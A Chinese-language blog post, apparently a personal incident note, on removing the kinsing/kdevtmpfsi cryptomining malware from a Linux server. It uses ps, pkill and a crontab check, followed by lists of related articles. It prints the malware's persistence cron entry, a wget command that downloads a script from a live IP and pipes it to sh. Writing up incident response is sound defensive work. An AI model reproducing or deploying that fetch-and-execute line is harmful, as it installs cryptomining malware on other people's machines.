文章目录

  • 中毒特征磁盘cpu 跑满 100%
  • 如何处理
  • 反复发作

中毒特征磁盘cpu 跑满 100%

如何处理

电脑中了挖矿病毒

ps -aux | grep kinsing
root     19447  0.0  1.8 119172 35084 ?        Sl   4月15   0:04 /var/tmp/kinsing
root     27247  0.0  0.0 112728   972 pts/0    D+   07:47   0:00 grep --color=auto kinsingps -aux | grep kdevtmpfsi
root     25493 94.7  0.0 515448  1620 ?        Ssl  07:46   1:17 /tmp/kdevtmpfsi
root     27249  0.0  0.0 112728   980 pts/0    R+   07:47   0:00 grep --color=auto kdevtmpfsipkill -9 kinsing
pkill -9 kdevtmpfsi

反复发作

#杀掉以后还会换端口
pkill -9 kinsing
[root@localhost tmp]# ps -aux | grep kinsing
root      6087  0.0  0.0 112728   976 pts/0    S+   07:56   0:00 grep --color=auto kinsing

查看定时任务
crontab -l
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1pkill -9 kinsingps -aux | grep kinsing
终于删掉了

linux 中了挖矿病毒相关推荐

  1. Linux中处置挖矿病毒样本演示

    一.病毒特征 1.top  查看cup使用率 CUP使用率极高,也可以看到它的PID 2.查看网络连接数 netstat -anpt | grep tcp 连接数较高. 二.处置 1.kill pid ...

  2. 服务器中了挖矿病毒的检测及删除方法

    最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作. 经排查是部分linux服务器中了挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢. 现将清除挖矿病 ...

  3. 服务器的安全应该从哪些角度考虑-中了挖矿病毒

    我们有客户服务器区域中了挖矿病毒, 这个应该怎么防护,服务器的安全应该从哪些角度考虑 ********* 这个东西比较复杂,关键就是怎么感染的挖矿病毒,首先你要把原始的这个边界上的那个防火墙检查一下, ...

  4. 服务器中了挖矿病毒的检测及删除方法(如dhpcd,kdevtmpfs等)

    最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作. 经排查是部分linux服务器中了挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢. 现将清除挖矿病 ...

  5. jenkins漏洞导致服务器中了挖矿病毒!cpu飙高351%!看我如何消灭它!

    作者:SilentBillows,资深Java工程师,架构师小秘圈特约作者!欢迎大家投稿,在后台回复投稿即可! 一, 定位问题 1.发现cpu异常,查看对应的进程信息 [root@versionlib ...

  6. 如何快速发现linux系统有挖矿病毒

    使用系统监控工具:可以使用系统自带的top.htop等工具或第三方监控工具,查看系统的CPU.内存.网络等资源占用情况,如果发现异常占用情况,可能存在挖矿病毒. 查看进程信息:使用ps命令查看系统的进 ...

  7. Ubuntu16.04.06 LTS -bash 进程占用cpu很高,中了挖矿病毒

    环景: Ubuntu16.04.06 LTS 问题描述: -bash 进程占用cpu很高,别的进程开启运行过后就被它killed,-bash一直占用50%的CPU,服务器被拉的嗷嗷叫 解决方案: 1. ...

  8. 阿里云服务器中招挖矿病毒XMrig miner解决方法

    今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用.今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu ...

  9. linux实战清理挖矿病毒kthreaddi

    故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经被篡改.需要借助其他的工具. 安装busybox 系 ...

最新文章

  1. R语言层次聚类:通过内平方和(Within Sum of Squares, WSS)选择最优的聚类K值、以内平方和(WSS)和K的关系并通过弯头法(elbow method)获得最优的聚类个数
  2. 用MFC类来操作数据库的方法
  3. nssl1193-地主【dp】
  4. 楼梯计算机公式,各种楼梯面积的计算公式汇总
  5. Hibernate的核心API
  6. 游标sql server_SQL Server游标教程
  7. 当公司辞掉85后测试员选择95后测试员后...
  8. 【MYSQL笔记】复制删除和表和记录
  9. Cocos2d-x3.0-倾斜列表
  10. XCode编译器里有鬼 – XCodeGhost样本分析
  11. 新书出版 |《数据库程序员面试笔试宝典》
  12. vue 带节假日考勤状态的日历
  13. kaptcha生成自定义图片验证码
  14. 板内板间通信协议及接口(六)RS232 RS485 RS422
  15. GAN之野狼DiscoGAN
  16. php布道师,百度智能小程序布道师计划发布,打造全链条导师服务
  17. 3-----A Forcast for Bicycle Rental Demand Based on Random Forests and Multiple Linear Regression
  18. Gym - 101653T Runes [模拟]
  19. mysql日志管理及主从复制
  20. 时间序列模型(1)--移动平均法

热门文章

  1. 微信小程序app.ts全局变量出现报错?
  2. 微信小程序+jsp+Mysql 电影详情的微信小程序 源代码+设计文档+说明文档
  3. java程序编译成exe文件_将java程序编译成独立运行的exe文件
  4. idea拉取并编译启动spring源码
  5. JSJ2021A6(时间限制:20000ms 内存限制:65536KB)
  6. 具体芯片的I2C_Adapter驱动分析
  7. 【重新定义matlab强大系列八】利用matlab求局部值(函数islocalmax求局部最大值+函数islocalmin求局部最小值)
  8. 2017美国数学建模MCM A题(连续型)翻译 管理赞比西河 Managing The Zambezi River
  9. 【系统分析师之路】系统安全章节错题集锦
  10. Android-音视频学习系列(一)-JNI-从入门到精通,android开发入门